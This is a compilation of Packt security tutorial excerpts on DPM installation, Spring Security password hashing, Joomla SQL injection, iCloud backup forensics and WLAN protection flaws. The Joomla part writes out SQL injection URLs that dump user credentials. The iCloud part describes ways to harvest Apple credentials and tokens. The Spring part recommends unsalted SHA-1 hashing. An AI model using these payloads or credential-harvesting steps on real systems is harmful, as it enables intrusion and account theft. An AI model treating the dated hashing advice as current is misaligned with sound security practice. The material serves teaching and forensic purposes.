
How-To Tutorials - Security

174 Articles

Installing Data Protection Manager 2010

Packt
01 Jun 2011
6 min read
With a DPM upgrade you face many of the same questions as with a fresh installation: are the prerequisites in place, is the operating system patched, and is DPM 2007 fully patched and ready for the upgrade? This article walks you through each step of the DPM installation process in the first half and the DPM 2007 to DPM 2010 upgrade in the second half. After reading it, you should know what to look for when working through the prerequisites and requirements, so that your install or upgrade goes smoothly.

Prerequisites

In this section we jump right into the prerequisites for DPM and how to install them, as well as the two different ways to install DPM. We will also go through the DPM 2007 to DPM 2010 upgrade process. First, let's look at the hardware and software requirements and a pre-install step that is needed before you can actually install DPM 2010.

Hardware requirements

DPM 2010 requires a 1 GHz (dual-core or faster) processor and 4 GB of RAM or more; the page file should be set to 1.5 to 2 times the amount of RAM on the computer. The DPM disk space requirements are as follows:

- DPM installation location: 3 GB free
- Database file drive: 900 MB free
- System drive: 1 GB free
- Disk space for protected data: 2.5 to 3 times the size of the protected data

DPM also needs to run on a dedicated, single-purpose computer.

Software requirements

DPM has requirements for both the operating system and the software that needs to be on the server before DPM can be installed. Let's take a look at what these requirements are.

Operating system

DPM 2007 can be installed on both 32-bit and x64 operating systems, but DPM 2010 is supported only on x64 operating systems. DPM can be installed on Windows Server 2008 and Windows Server 2008 R2; installing DPM 2010 on Windows Server 2008 R2 is recommended. DPM can be deployed in a Windows Server 2008, Windows Server 2008 R2, or Windows Server 2003 Active Directory domain.

Whichever operating system you use, be sure to run Windows Update and completely patch the server before you start the DPM installation. If you use Windows Server 2008 for your DPM deployment, you will need to install the following hotfixes before you start the DPM installation:

- FIX: You are prompted to format the volume when a formatted volume is mounted on an NTFS folder on a computer running Windows Server 2008 or Windows Vista (KB971254).
- Dynamic disks are marked as "Invalid" on a computer running Windows Server 2008 or Windows Vista when you bring the disks online, take the disks offline, or restart the computer if Data Protection Manager is installed (KB962975).
- An application or service that uses a file system filter driver may experience function failure on a computer running Windows Vista, Windows Server 2003, or Windows Server 2008 (KB975759).

Software

By default, DPM installs any software prerequisite automatically if it is not already enabled or installed. Sometimes these prerequisites fail during DPM setup; if they do, you can install them manually. Visit the Microsoft TechNet site for detailed information on installing the software prerequisites.
The following is a list of the software that DPM requires before it can be installed:

- Microsoft .NET Framework 3.5 with Service Pack 1 (SP1)
- Microsoft Visual C++ 2008 Redistributable
- Windows PowerShell 2.0
- Windows Installer 4.5 or later
- Windows Single Instance Store (SIS)
- Microsoft Application Error Reporting

NOTE: It is recommended that you manually install Single Instance Store on your server before you even begin the DPM 2010 installation. A step-by-step installation, along with a detailed explanation of Single Instance Store, follows below.

User privilege requirements

The server that you plan to install DPM on must be joined to a domain before you install the DPM software. To join the server to the domain you need at least domain administrative privileges, and you also need administrative privileges on the local server to install the DPM software.

Restrictions

DPM has to be installed on a dedicated server. It is best to make sure that DPM is the only server role running on that server; you will run into issues if you try to install DPM alongside other roles. The following are the restrictions you need to pay attention to when installing DPM:

- DPM should not be installed on a domain controller (not recommended)
- DPM cannot be installed on an Exchange server
- DPM cannot be installed on a server with System Center Operations Manager installed on it
- The server you install on cannot be a node in a cluster

There is one exception: you can install DPM on a domain controller and make it work, but this is not supported by Microsoft.

Single Instance Store

Before you install DPM on your server, it is important to install a technology called Single Instance Store (SIS). SIS ensures you get the maximum performance out of your disk space and reduces bandwidth needs for DPM. SIS is a technology that keeps the overhead of handling duplicate files low, which is often referred to as de-duplication. It eliminates data duplication by storing only one copy of a file on backup storage media, and it is used in storage, mail, and backup solutions such as DPM. SIS helps lower bandwidth costs when copying data across a network, as well as the storage space needed. Microsoft has used a single instance store in Exchange since version 4.0.

SIS searches a hard disk and identifies duplicate files. It then saves only one copy of each file to a central location, such as a DPM storage pool, and replaces the other copies with pointers that direct you to the copy already stored in the SIS repository.

Installing Single Instance Store (SIS)

The following procedure walks you through the steps required to install SIS:

1. Click on Start and then click on Run. In the Run dialog box, type CMD.exe and press OK.
2. At the command prompt, type the following and press Enter:

    start /wait ocsetup.exe SIS-Limited /quiet /norestart

3. Restart the server.

To ensure the installation of SIS went okay, check for the existence of the SIS registry key. Click on Start, then click Run. In the Run dialog box, type regedit and press OK. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SIS. If the SIS key is present in the registry, Single Instance Store is installed properly and you can be sure to get the maximum performance out of your disk space on the DPM server.
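If you prefer to script this check, the following minimal sketch (an illustration, not part of the original article) uses only Python's standard winreg module to test for the same registry key; run it locally on the Windows host.

    import winreg

    SIS_KEY = r"SYSTEM\CurrentControlSet\Services\SIS"

    def sis_installed() -> bool:
        # True if the SIS service key created by ocsetup.exe exists under HKLM.
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SIS_KEY):
                return True
        except OSError:
            # Key not found (or not readable), so SIS is not confirmed as installed.
            return False

    if __name__ == "__main__":
        print("Single Instance Store installed:", sis_installed())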


Encode your password with Spring Security 3

Packt
24 May 2010
6 min read
This article by Peter Mularien is an excerpt from the book Spring Security 3. In this article, we will:

- Examine different methods of configuring password encoding
- Understand the password salting technique of providing additional security to stored passwords

(For more resources on Spring, see here.)

In any secured system, password security is a critical aspect of trust and authoritativeness of an authenticated principal. Designers of a fully secured system must ensure that passwords are stored in a way that makes it impractically difficult for malicious users to compromise them. The following general rules should be applied to passwords stored in a database:

- Passwords must not be stored in cleartext (plain text)
- Passwords supplied by the user must be compared to the recorded passwords in the database
- A user's password should not be supplied to the user upon demand (even if the user forgets it)

For the purposes of most applications, the best fit for these requirements involves one-way encoding or encryption of passwords, as well as some type of randomization of the encrypted passwords. One-way encoding provides the security and uniqueness properties that are important to properly authenticate users, with the added bonus that once encrypted, the password cannot be decrypted.

In most secure application designs, it is neither required nor desirable to ever retrieve the user's actual password upon request, as providing the user's password to them without proper additional credentials could present a major security risk. Most applications instead provide the user the ability to reset their password, either by presenting additional credentials (such as their social security number, date of birth, tax ID, or other personal information), or through an email-based system.

Storing other types of sensitive information

Many of the guidelines that apply to passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways; for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).

You may already be thinking ahead and wondering, given our (admittedly unrealistic) approach of using SQL to populate our HSQL database with users, how do we encode the passwords? HSQL, and most other databases for that matter, don't offer encryption methods as built-in database functions. Typically, the bootstrap process (populating a system with initial users and data) is handled through some combination of SQL loads and Java code. Depending on the complexity of your application, this process can get very complicated.

For the JBCP Pets application, we'll retain the embedded-database declaration and the corresponding SQL, and then add a small bit of Java to fire after the initial load to encrypt all the passwords in the database. For password encryption to work properly, the two actors involved must use password encryption in synchronization, ensuring that the passwords are treated and validated consistently. Password encryption in Spring Security is encapsulated and defined by implementations of the o.s.s.authentication.encoding.PasswordEncoder interface.
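Before looking at the Spring configuration, here is a minimal, language-agnostic sketch of the one-way encode-and-compare idea (written in Python purely for illustration; it is not the Spring Security API). SHA-1 is used only to mirror the ShaPasswordEncoder configured later, and no salt is applied yet.

    import hashlib

    def encode_password(plaintext: str) -> str:
        # One-way encoding: only the digest is ever stored, never the cleartext.
        return hashlib.sha1(plaintext.encode()).hexdigest()

    def password_matches(candidate: str, stored_digest: str) -> bool:
        # Login re-encodes the supplied password and compares digests; the stored
        # value is never (and cannot be) decrypted back to the original password.
        return encode_password(candidate) == stored_digest

    stored = encode_password("s3cret")           # what ends up in the users table
    print(password_matches("s3cret", stored))    # True
    print(password_matches("guess", stored))     # False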
Simple configuration of a password encoder is possible through the <password-encoder> declaration within the <authentication-provider> element, as follows:

    <authentication-manager alias="authenticationManager">
      <authentication-provider user-service-ref="jdbcUserService">
        <password-encoder hash="sha"/>
      </authentication-provider>
    </authentication-manager>

You'll be happy to learn that Spring Security ships with a number of implementations of PasswordEncoder, which are applicable for different needs and security requirements. The implementation used can be specified using the hash attribute of the <password-encoder> declaration. The following list shows the out-of-the-box implementation classes, what they do, and their corresponding hash values. Note that all implementations reside in the o.s.s.authentication.encoding package.

- PlaintextPasswordEncoder (hash value: plaintext): Encodes the password as plaintext. This is the default DaoAuthenticationProvider password encoder.
- Md4PasswordEncoder (hash value: md4): A PasswordEncoder utilizing the MD4 hash algorithm. MD4 is not a secure algorithm; use of this encoder is not recommended.
- Md5PasswordEncoder (hash value: md5): A PasswordEncoder utilizing the MD5 one-way encoding algorithm.
- ShaPasswordEncoder (hash values: sha, sha-256): A PasswordEncoder utilizing the SHA one-way encoding algorithm. This encoder can support configurable levels of encoding strength.
- LdapShaPasswordEncoder (hash values: {sha}, {ssha}): An implementation of the LDAP SHA and LDAP SSHA algorithms used in integration with LDAP authentication stores.

As with many other areas of Spring Security, it's also possible to reference a bean definition implementing PasswordEncoder to provide more precise configuration and allow the PasswordEncoder to be wired into other beans through dependency injection. For JBCP Pets, we'll need to use this bean reference method in order to encode the bootstrapped user data. Let's walk through the process of configuring basic password encoding for the JBCP Pets application.

Configuring password encoding

Configuring basic password encoding involves two pieces: encrypting the passwords we load into the database after the SQL script executes, and ensuring that the DaoAuthenticationProvider is configured to work with a PasswordEncoder.

Configuring the PasswordEncoder

First, we'll declare an instance of a PasswordEncoder as a normal Spring bean:

    <bean class="org.springframework.security.authentication.encoding.ShaPasswordEncoder" id="passwordEncoder"/>

You'll note that we're using the SHA-1 PasswordEncoder implementation. This is an efficient one-way encryption algorithm, commonly used for password storage.

Configuring the AuthenticationProvider

We'll need to configure the DaoAuthenticationProvider to have a reference to the PasswordEncoder, so that it can encode and compare the presented password during user login. Simply add a <password-encoder> declaration and refer to the bean ID we defined in the previous step:

    <authentication-manager alias="authenticationManager">
      <authentication-provider user-service-ref="jdbcUserService">
        <password-encoder ref="passwordEncoder"/>
      </authentication-provider>
    </authentication-manager>

Try to start the application at this point, and then try to log in. You'll notice that what were previously valid login credentials are now being rejected. This is because the passwords stored in the database (loaded with the bootstrap test-users-groups-data.sql script) are not stored in an encrypted form that matches the password encoder.
We'll need to post-process the bootstrap data with some simple Java code.

Writing the database bootstrap password encoder

The approach we'll take for encoding the passwords loaded via SQL is to have a Spring bean that executes an init method after the embedded-database bean is instantiated. The code for this bean, com.packtpub.springsecurity.security.DatabasePasswordSecurerBean, is fairly simple.

    public class DatabasePasswordSecurerBean extends JdbcDaoSupport {
      @Autowired
      private PasswordEncoder passwordEncoder;

      public void secureDatabase() {
        getJdbcTemplate().query("select username, password from users",
            new RowCallbackHandler() {
              @Override
              public void processRow(ResultSet rs) throws SQLException {
                String username = rs.getString(1);
                String password = rs.getString(2);
                String encodedPassword = passwordEncoder.encodePassword(password, null);
                getJdbcTemplate().update(
                    "update users set password = ? where username = ?",
                    encodedPassword, username);
                logger.debug("Updating password for username: " + username
                    + " to: " + encodedPassword);
              }
            });
      }
    }

The code uses the Spring JdbcTemplate functionality to loop through all the users in the database and encode each password using the injected PasswordEncoder reference. Each password is updated individually.


Preventing SQL Injection Attacks on your Joomla Websites

Packt
23 Oct 2009
6 min read
Introduction

Mark Twain once said, "There are only two certainties in life: death and taxes." Even in web security there are two certainties: it's not if you are attacked, but when and how your site will be taken advantage of. There are several types of attack that your Joomla! site may be vulnerable to, such as CSRF, buffer overflows, blind SQL injection, denial of service, and others that are yet to be found. The top issues in PHP-based websites are:

- Incorrect or invalid (intentional or unintentional) input
- Access control vulnerabilities
- Session hijacks and attempts on session IDs
- SQL Injection and Blind SQL Injection
- Incorrect or ignored PHP configuration settings
- Divulging too much in error messages and poor error handling
- Cross Site Scripting (XSS)
- Cross Site Request Forgery, that is CSRF (one-click attack)

SQL Injections

SQL databases are the heart of the Joomla! CMS. The database holds the content, the users' IDs, the settings, and more. Gaining access to this valuable resource is the ultimate prize of the hacker. Accessing it can yield administrative access that exposes private information such as usernames and passwords, and can allow any number of bad things to happen. When you request a page from Joomla!, it forms a "query", a question for the database. The database does not suspect that you may be asking a malformed question and will attempt to process whatever the query is. Often, developers do not construct their code to watch for this type of attack. In fact, in the month of February 2008 alone, twenty-one new SQL Injection vulnerabilities were discovered in the Joomla! world.

The following examples are presented for your edification. Using any of these for any purpose is solely your responsibility and not mine.

Example 1:

    index.php?option=com_****&Itemid=name&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*

Example 2:

    index.php?option=com_****&task=****&Itemid=name&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

Both of these will reveal, under the right set of circumstances, the usernames and passwords in your system. There is a measure of protection in Joomla! 1.0.13, with an encryption scheme that will render the passwords useless. However, it does not make sense to allow vulnerable extensions to remain; yielding ANY kind of information like this is unacceptable. The results of the second example, run on a test system with the vulnerable extension, showed two pieces of information: the username listed as Author, and the hex string (partially blurred in the original screenshot) that is the hashed password.

Not all MD5 hashes can be broken easily, but there are websites where you enter a hash and they attempt to crack it, supporting several popular hash types. When I entered this hash (of a password) into such a tool, I found the password to be Anthony. It's worth noting that this hash and its password are the result of a website getting broken into, prompting the user to search for the "hash" left behind, thus yielding the password. The important news, however, is that if you are using Joomla! 1.0.13 or greater, the password's hash is now calculated with a "salt", making it nearly impossible to break.
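To see why that salt matters, consider the following small Python sketch (the password is the recovered example above; the salt value and the exact way Joomla! combines and stores the two are simplified assumptions for illustration): the same password yields a completely different digest once a salt is mixed in, so precomputed MD5 lookup tables stop being useful unless the salt is also known.

    import hashlib

    password = "Anthony"       # the example password recovered above
    salt = "k9Qf2Zr1"          # hypothetical per-user salt

    plain_md5 = hashlib.md5(password.encode()).hexdigest()
    salted_md5 = hashlib.md5((password + salt).encode()).hexdigest()

    print(plain_md5)    # this is what public MD5 lookup tables can reverse
    print(salted_md5)   # different digest; a table of plain MD5 hashes is useless here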
However, the standard MD5 could still be broken with enough effort in many cases. For more information about salting and MD5, see http://www.php.net/md5. For an interesting read on salting, you may wish to read this link: www.governmentsecurity.org/forum/lofiversion/index.php/t19179.htm

SQL Injection is a query put to an SQL database where data input was expected AND the application does not correctly filter the input. It allows hijacking of database information such as usernames and passwords, as we saw in the earlier example. Most of these attacks are based on two things. First, developers have coding errors in their code, or they have reused code from another application, thus spreading the error. The other issue is inadequate validation of input. In essence, it means trusting users to put in the RIGHT stuff, and not to put in queries meant to harm the system. User input is rarely to be trusted for this reason. It should always be checked for proper format, length, and range.

There are many ways to test for vulnerability to an SQL Injection, but one of the most common is to supply input such as me' or 1=1-- in a form field. In some cases, this may be enough to trigger a database to divulge details. This very simplistic example would not work in a typical login box. However, if it were presented to a vulnerable extension in a manner such as the following, it might work:

    <FORM action=http://www.vulnerablesite.com/Search.php method=post>
    <input type=hidden name=A value="me' or 1=1--">
    </FORM>

This "posting" method (presented as a very generic exploit and not meant to work per se in Joomla!) will attempt to break into the database by putting forward queries that would not necessarily be noticed. But why 1=1--? According to PHP.NET, "It is a common technique to force the SQL parser to ignore the rest of the query written by the developer with -- which is the comment sign in SQL."

You might be thinking, "So what if my passwords are hashed? They can get them but they cannot break them!" This is true, but if they wanted it badly, nothing keeps them from doing something such as this:

    INSERT INTO jos_mydb_users ('email','password','login_id','full_name')
    VALUES ('johndoe@email.com','default','Jdoe','John Doe');--';

This code has potential if inserted into a query such as this:

    http://www.yourdomain/vulnerable_extension//index.php?option=com_vulext INSERT INTO jos_mydb_users ('email','password','login_id','full_name') VALUES ('johndoe@email.com','default','Jdoe','John Doe');--';

Again, this is a completely bogus example and is not likely to work. But if you can get an SQL DB to divulge its information, you can get it to "accept" (insert) information it should not as well.
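The practical defence this article is building toward is to never concatenate user input into SQL. The sketch below illustrates the idea with Python's built-in sqlite3 module (Joomla! extensions would do the equivalent through Joomla's PHP database API; the table and values here are invented): bound parameters keep the 1=1 payload as literal data instead of executable SQL.

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jos_users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO jos_users VALUES ('admin', 'md5-hash-here')")

    user_input = "me' or 1=1--"   # the classic injection string shown above

    # Vulnerable pattern (do not do this): string concatenation lets the input
    # rewrite the query itself.
    # query = "SELECT * FROM jos_users WHERE username = '" + user_input + "'"

    # Safe pattern: a placeholder binds the input as data only.
    rows = conn.execute(
        "SELECT * FROM jos_users WHERE username = ?", (user_input,)
    ).fetchall()
    print(rows)   # [] : nothing leaks, the payload never becomes SQL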


Evidence Acquisition and Analysis from iCloud

Packt
09 Mar 2015
10 min read
This article by Mattia Epifani and Pasquale Stirparo, the authors of the book Learning iOS Forensics, introduces the cloud service provided by Apple to all its users, through which they can save their backups and other files on remote servers. In the first part of this article, we will show you the main characteristics of the service, and then the techniques to create and recover a backup from iCloud.

(For more resources related to this topic, see here.)

iCloud

iCloud is a free cloud storage and cloud computing service designed by Apple to replace MobileMe. The service allows users to store data (music, pictures, videos, and applications) on remote servers and share it among devices running iOS 5 or later, Apple computers running OS X Lion or later, or PCs with Windows Vista or later. Like its predecessor MobileMe, iCloud allows users to synchronize data between devices (e-mail, contacts, calendars, bookmarks, notes, reminders, iWork documents, and so on), or to make a backup of an iOS device (iPhone, iPad, or iPod touch) on remote servers rather than using iTunes and a local computer.

The iCloud service was announced on June 6, 2011 during the Apple Worldwide Developers Conference and became available to the public on October 12, 2011. The MobileMe service was consequently disabled on June 30, 2012 and all users were transferred to the new environment. In July 2013, iCloud had more than 320 million users.

Each iCloud account has 5 GB of free storage for owners of iDevices with iOS 5 or later and Mac users with Lion or later. Purchases made through iTunes (music, apps, videos, movies, and so on) do not count toward the occupied space and can be stored in iCloud and downloaded to all devices associated with the user's Apple ID. Moreover, the user has the option to purchase additional storage in denominations of 20, 200, 500, or 1,000 GB.

Access to the iCloud service can be made through the applications integrated into devices such as iDevices and Mac computers. To synchronize data on a PC, you need to install the iCloud Control Panel application, which can be downloaded for free from the Apple website. To synchronize contacts, e-mails, and calendar appointments on the PC, the user must have Microsoft Outlook 2007 or 2010, while synchronization of bookmarks requires Internet Explorer 9 or Safari.

iDevice backup on iCloud

iCloud allows users to make online backups of iDevices so that they can restore their data even to a different iDevice (for example, in case of replacement of the device). The choice of which backup mode to use can be made directly in the settings of the device or through iTunes when the device is connected to a PC or Mac. Once the user has activated the service, the device automatically backs up every time the following conditions are met:

- It is connected to the power cable
- It is connected to a Wi-Fi network
- Its screen is locked

iCloud online backups are incremental, through subsequent snapshots, and each snapshot is the state of the device at the time of its creation. The structure of a backup stored on iCloud is entirely analogous to that of a backup made with iTunes.

iDevice backup acquisition

Backups that are made online are, to all intents and purposes, not encrypted. Technically, they are encrypted, but the encryption key is stored with the encrypted files.
This choice was made by Apple so that users are able to restore a backup to a different device than the one that created it. Currently, the acquisition of iCloud backups is supported by two commercial tools (Elcomsoft Phone Password Breaker (EPPB) and Wondershare Dr.Fone) and one open source tool (iLoot, which is available at https://github.com/hackappcom/iloot).

The interesting aspect is that the same technique was used in the iCloud hack performed in 2014, when personal photos and videos were stolen from the victims' iCloud accounts and released over the Internet (more information is available at http://en.wikipedia.org/wiki/2014_celebrity_photo_hack). Though there is no strong evidence describing exactly how the hack was carried out, it is believed that Apple's Find My iPhone service was responsible: Apple did not implement any security measure to lock an account after a particular number of wrong login attempts, which directly raises the possibility of exploitation (brute force, in this case). The tool used to brute-force iCloud passwords, named iBrute, is still available at https://github.com/hackappcom/ibrute, but has not been working since January 2015.

Case study – iDevice backup acquisition and EPPB with usernames and passwords

As reported on the software manufacturer's website, EPPB allows the acquisition of data stored in an online backup. Moreover, online backups can be acquired without having the original iOS device in hand. All that's needed to access online backups stored in the cloud service are the original user's credentials: their Apple ID, accompanied by the corresponding password. The login credentials for iCloud can be retrieved as follows:

- Using social engineering techniques
- From a PC (or a Mac) on which they are stored, with tools such as iTunes Password Decryptor (http://securityxploded.com/) or WebBrowserPassView (http://www.nirsoft.net/)
- Directly from the device (iPhone/iPad/iPod touch) by extracting the credentials stored in the keychain

Once the credentials have been extracted, downloading the backup is very simple. Follow the step-by-step instructions provided in the program: enter the username and password in the Download backup from iCloud dialog by going to Tools | Apple | Download backup from iCloud | Password and clicking on Sign in.

At this point, the software displays a screen that shows all the backups present in the user account and allows you to download the data. It is important to note the following two options:

- Restore original file names: If enabled, this option interprets the contents of the Manifest.mbdb file, rebuilding the backup with the same tree structure of domains and sub-domains. If the investigator intends to carry out the analysis with traditional software for data extraction from backups, it is recommended that you disable this option because, if enabled, that software will no longer be able to parse the backup.
- Download only specific data: This option is very useful when the investigator needs to download only some specific information. Currently, the software supports Call history, Messages, Attachments, Contacts, Safari data, Google data, Calendar, Notes, Info & Settings, Camera Roll, Social Communications, and so on. In this case, the Restore original file names option is automatically activated and cannot be disabled.

Once you have chosen the destination folder for the download, the backup starts.
The time required to download depends on the size of the storage space available to the user and the number of snapshots stored within that space.

Case study – iDevice backup acquisition and EPPB with an authentication token

The Forensic edition of Phone Password Breaker from Elcomsoft is a tool that gives a digital forensics examiner the power to obtain iCloud data without having the original Apple ID and password. This kind of access is made possible via the use of an authentication token extracted from the user's computer. These tokens can be obtained from any suspect's computer where iCloud Control Panel is installed. In order to obtain the token, the user must have been logged in to iCloud Control Panel on that PC at the time of acquisition, which means that the acquisition can be performed only in a live environment or in a virtualized image of the suspect's computer connected to the Internet. More information about this tool is available at http://www.elcomsoft.com/eppb.html.

To extract the authentication token from the iCloud Control Panel, the analyst needs to use a small executable on the machine called atex.exe. The executable can be launched from an external pen drive during a live forensics activity:

1. Open Command Prompt and launch the atex -l command to list all the local iCloud users.
2. Launch atex.exe again with the getToken parameter (-t), and enter the username of the specific local Windows user and the password for this user's Windows account.
3. A file called icloud_token_<timestamp>.txt will be created in the directory from which atex.exe was launched. The file contains the Apple ID of the current iCloud Control Panel user and its authentication token.

Now that the analyst has the authentication token, they can start the EPPB software, navigate to Tools | Apple | Download backup from iCloud | Token, copy and paste the token (be careful to copy the entire second row from the .txt file created by the atex.exe tool) into the software, and click on Sign in. At this point, the software shows the screen for downloading the iCloud backups stored within the user's iCloud space, in the same way as when you provide a username and password.

The procedure for the Mac OS X version is exactly the same. Just launch the Mac version of atex from a shell and follow the steps shown previously for the Windows environment:

- sudo atex -l: This command is used to get the list of all iCloud users.
- sudo atex -t -u <username>: This command is used to get the authentication token for a specific user. You will need to enter the user's system password when prompted.

Case study – iDevice backup acquisition with iLoot

The same activity can be performed using the open source tool called iLoot (available at https://github.com/hackappcom/iloot). It requires Python and some dependencies; we suggest checking the website for the latest version and requirements. By accessing the help (iloot.py -h), we can see the various available options.
We can choose the output folder; whether to download one specific snapshot; whether we want the backup downloaded in the original iTunes format or with domain-style directories; whether to download only specific information (for example, call history, SMS, or photos); or only a specific domain. To download the backup, you only need to enter the account credentials. At the end of the process, you will find the backup in the output folder (the default folder's name is /output).

Summary

In this article, we introduced the iCloud service provided by Apple to store files on remote servers and back up iDevices. In particular, we showed the techniques to download the backups stored on iCloud when you know the user's credentials (Apple ID and password), and when you have access to a computer on which the iCloud Control Panel software is installed and in use.

Resources for Article:

Further resources on this subject:

- Introduction to Mobile Forensics [article]
- Processing the Case [article]
- BackTrack Forensics [article]


Common WLAN Protection Mechanisms and their Flaws

Packt
07 Mar 2016
19 min read
In this article by Vyacheslav Fadyushin, the author of the book Building a Pentesting Lab for Wireless Networks, we will discuss various WLAN protection mechanisms and the flaws present in them. To be able to protect a wireless network, it is crucial to clearly understand which protection mechanisms exist and which security flaws they have. This topic will be useful not only for readers who are new to Wi-Fi security, but also as a refresher for experienced security specialists.

(For more resources related to this topic, see here.)

Hiding SSID

Let's start with one of the common mistakes made by network administrators: relying only on security by obscurity. In the frame of the current subject, this means using a hidden WLAN SSID (short for service set identifier), or simply a hidden WLAN name. A hidden SSID means that a WLAN does not send its SSID in the broadcast beacons advertising itself and doesn't respond to broadcast probe requests, thus making itself unavailable in the list of networks on Wi-Fi-enabled devices. It also means that normal users do not see that WLAN in their available networks list.

But the lack of WLAN advertising does not mean that an SSID is never transmitted in the air: it is actually transmitted in plaintext in many packets exchanged between access points and the devices connected to them, regardless of the security type used. Therefore, SSIDs are always available to all Wi-Fi network interfaces in range and visible to any attacker using various passive sniffing tools.

MAC filtering

To be honest, MAC filtering cannot even be considered a security or protection mechanism for a wireless network, but it is still called one in various sources. So let's clarify why we cannot call it a security feature. Basically, MAC filtering means allowing only those devices that have MAC addresses from a pre-defined list to connect to a WLAN, and not allowing connections from other devices. MAC addresses are transmitted unencrypted in Wi-Fi and are extremely easy for an attacker to intercept without even being noticed.

[Figure: An example of a wireless traffic sniffing tool easily revealing MAC addresses]

Keeping in mind the extreme simplicity of changing the physical (MAC) address of a network interface, it becomes obvious why MAC filtering should not be treated as a reliable security mechanism. MAC filtering can be used to support other security mechanisms, but it should not be used as the only security measure for a WLAN.

WEP

Wired Equivalent Privacy (WEP) was born almost 20 years ago, at the same time as the Wi-Fi technology itself, and was integrated as a security mechanism into the IEEE 802.11 standard. As often happens with new technologies, it soon became clear that WEP contains weaknesses by design and cannot provide reliable security for wireless networks. Several attack techniques were developed by security researchers that allow them to crack a WEP key in a reasonable time and use it to connect to a WLAN or intercept network communications between the WLAN and client devices.

Let's briefly review how WEP encryption works and why it is so easy to break. WEP uses so-called initialization vectors (IVs) concatenated with a WLAN's shared key to encrypt transmitted packets. After encrypting a network packet, the IV is added to the packet as-is and sent to the receiving side, for example, an access point.

[Figure: The WEP encryption process]
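To make the per-packet keystream idea concrete, here is a minimal Python sketch of the WEP-style flow just described (an illustration only: the key and IV values are invented, and the CRC-32 integrity value that real WEP appends to the plaintext is omitted).

    def rc4(key: bytes, data: bytes) -> bytes:
        # Key-scheduling algorithm (KSA)
        S = list(range(256))
        j = 0
        for i in range(256):
            j = (j + S[i] + key[i % len(key)]) % 256
            S[i], S[j] = S[j], S[i]
        # Pseudo-random generation algorithm (PRGA), XORed with the data
        out = bytearray()
        i = j = 0
        for byte in data:
            i = (i + 1) % 256
            j = (j + S[i]) % 256
            S[i], S[j] = S[j], S[i]
            out.append(byte ^ S[(S[i] + S[j]) % 256])
        return bytes(out)

    iv = bytes([0x01, 0x02, 0x03])            # 24-bit IV, sent in cleartext with the frame
    shared_key = bytes.fromhex("1a2b3c4d5e")  # 40-bit shared WEP key (made up)
    plaintext = b"hello, wlan"

    ciphertext = rc4(iv + shared_key, plaintext)          # per-packet key = IV || shared key
    assert rc4(iv + shared_key, ciphertext) == plaintext  # XOR with the same keystream decrypts

Because the IV travels in the clear, anyone who captures enough frames with repeated IVs obtains multiple ciphertexts produced by the same keystream, which is exactly what the attacks described next exploit.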
An attacker just needs to collect enough IVs, which is a trivial task using additional replay attacks to force victims to generate more IVs. Even worse, there are attack techniques that allow an attacker to penetrate WEP-protected WLANs even without connected clients, which makes those WLANs vulnerable by default. Additionally, WEP does not have cryptographic integrity control, which makes it vulnerable not only to attacks on confidentiality. There are numerous ways in which an attacker can abuse a WEP-protected WLAN, for example:

- Decrypting network traffic using passive sniffing and statistical cryptanalysis
- Decrypting network traffic using active attacks (a replay attack, for example)
- Traffic injection attacks
- Unauthorized WLAN access

Although WEP was officially superseded by the WPA technology in 2003, it can still sometimes be found in private home networks and even in some corporate networks (mostly belonging to small companies nowadays). But this security technology has become very rare and will not be used in the future, largely due to awareness in corporate networks and because manufacturers no longer activate WEP by default on new devices. In our humble opinion, device manufacturers should not include WEP support in their new devices at all, to avoid its usage and increase their customers' security. From a security specialist's point of view, WEP should never be used to protect a WLAN, but it can be used for Wi-Fi security training purposes.

Regardless of the security type in use, shared keys always add an additional security risk: users tend to share keys, increasing the risk of key compromise and reducing accountability for key privacy. Moreover, the more devices use the same key, the greater the amount of traffic that becomes available to an attacker for cryptanalytic attacks, increasing their performance and chances of success. This risk can be minimized by using personal identifiers (a key or certificate) for users and devices.

WPA/WPA2

Due to the numerous WEP security flaws, the next generation of Wi-Fi security mechanisms became available in 2003: Wi-Fi Protected Access (WPA). It was announced as an intermediate solution until WPA2 became available and contained significant security improvements over WEP. Those improvements include:

- Stronger encryption.
- Cryptographic integrity control: WPA uses an algorithm called Michael instead of the CRC used in WEP. This is meant to prevent altering data packets on the fly and protects against resending sniffed packets.
- Usage of temporary keys: The Temporal Key Integrity Protocol (TKIP) automatically changes the encryption keys generated for every packet. This is the major improvement over static WEP, where encryption keys have to be entered manually in an AP's configuration. TKIP also operates on RC4, but the way it is used was improved.
- Support for client authentication: The capability to use dedicated authentication servers for user and device authentication made WPA suitable for use in large enterprise networks.

Support for the cryptographically strong Advanced Encryption Standard (AES) algorithm was implemented in WPA, but it was made optional rather than mandatory. Although WPA was a significant improvement over WEP, it was a temporary solution before WPA2 was released in 2004 and became mandatory for all new Wi-Fi devices.
WPA2 works very similarly to WPA, and the main differences between WPA and WPA2 lie in the algorithms used to provide security:

- AES became the mandatory encryption algorithm in WPA2, instead of the default RC4 in WPA
- The TKIP used in WPA was replaced by Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)

Because of their very similar workflows, WPA and WPA2 are vulnerable to similar or identical attacks and are usually referred to together as WPA/WPA2. Both WPA and WPA2 can work in two modes: pre-shared key (PSK) or personal mode, and enterprise mode.

Pre-shared key mode

Pre-shared key or personal mode was intended for home and small office use, where networks have low complexity. We are more than sure that all our readers have met this mode and that most of you use it at home to connect your laptops, mobile phones, tablets, and so on to your home networks. The general idea of PSK mode is to use the same secret key on the access point and on the client device to authenticate the device and establish an encrypted connection for networking. The process of WPA/WPA2 authentication using a PSK consists of four phases and is also called a 4-way handshake.

[Figure: WPA/WPA2 4-way handshake]

